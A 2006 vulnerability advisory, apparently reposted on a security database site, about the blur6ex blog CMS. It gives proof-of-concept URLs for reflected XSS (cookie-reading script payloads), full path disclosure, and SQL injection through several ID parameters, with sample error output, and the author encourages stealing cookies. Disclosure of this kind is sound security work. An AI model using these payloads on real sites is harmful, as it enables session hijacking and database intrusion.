Multiple vulnerabilities in Blur6ex

2006-04-11 / 2006-04-12
Credit: Rusydi Hasan M
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-1763
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

k k kkkk k kkkk k k kkkkkk kkkkkk kkkk k k k k k k k k k k k k k k kk k k k k kk k k k k kk <><> kkkkk k kkkkk kk kk kkkkkk k k k k k k kk k k k k k k k kk k k k k k k k k k k k k kkkk k kkkk k k kk k k kkkk k kk k k k -+| Multiple Vulnerabilities in blur6ex Author : Rusydi Hasan M a.k.a : cR45H3R Date : April,10th 2006 Place : Indonesia, Cilacap -+| Software description blur6ex is a content management system for manage a blog. Version : 0.3.462 -+| the bugs 1. I got XSS and full path disclosures in one step. 2. SQL injection -+| Proof of Concept [PoC] [0] XSS + Full path disclosures http://[victim]/[blur6ex_dir]/index.php?shard=[XSS_here] http://[victim]/[blur6ex_dir]/index.php?shard=login&action=g_error&error msg=[XSS_here] after you put XSS on the URL, the XSS will work and you also get the root directory from the error message. E[x]ample : http://127.0.0.1/blur/index.php?shard=%3Ch1%3Ejust%20test%20your%20web%3 C/h1%3E Warning: main(): Failed opening 'engine/shards/<h1>just test your web</h1>.php' for inclusion (include_path='.:/usr/lib/php/:/usr/share/pear/') in /var/www/html/blur/index.php on line 108 "just test your web" will show as <h1> http://127.0.0.1/blur/index.php?shard=login&action=g_error&errormsg=%3Cs cript%3Ealert(document. cookie)%3C/script%3E http://127.0.0.1/blur/index.php?shard=%3Cscript%3Ealert(document.cookie) %3C/script%3E http://127.0.0.1/blur/index.php?shard=%3Cmarquee%3E --> seems good.try it :) Now, go and steal the cookie but don't eat it :P. [1] SQL injection http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_reply&ID=[SQ L_here] http://[victim]/[blur6ex_dir]/index.php?shard=blog&action=g_permaPost&ID =[SQL_here] http://[victim]/[blur6ex_dir]/index.php?shard=content&action=g_viewConte nt&ID=[SQL_here] You can see the database structure in http://[victim]/[blur6ex_dir]/install/blur6ex_tables.sql *if you were lucky :)* E[x]ample : http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID='or%201=1/* You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''or 1=1/*' at line 1 http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201 =0 http://127.0.0.1/blur/index.php?shard=blog&action=g_reply&ID=1%20and%201 =1 -+| Vendor I'm Still lazy [LOLZ] -+| Shoutz % fwerd,chiko,cbug,ladybug,litherr,cybertank,cyb3rh3b,cahcephoe,scut,degle ng,etc % y3dips, moby, comex, z3r0byt3, K-159, c-a-s-e, S`to, lirva32, anonymous, the day % ph03n1x,ghoz,spyoff,slackX,r34d3r,xnuxer,sakitjiwa,m_beben -+| Contact crasher (at) kecoak.or (dot) id [email concealed] || http://kecoak.or.id


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top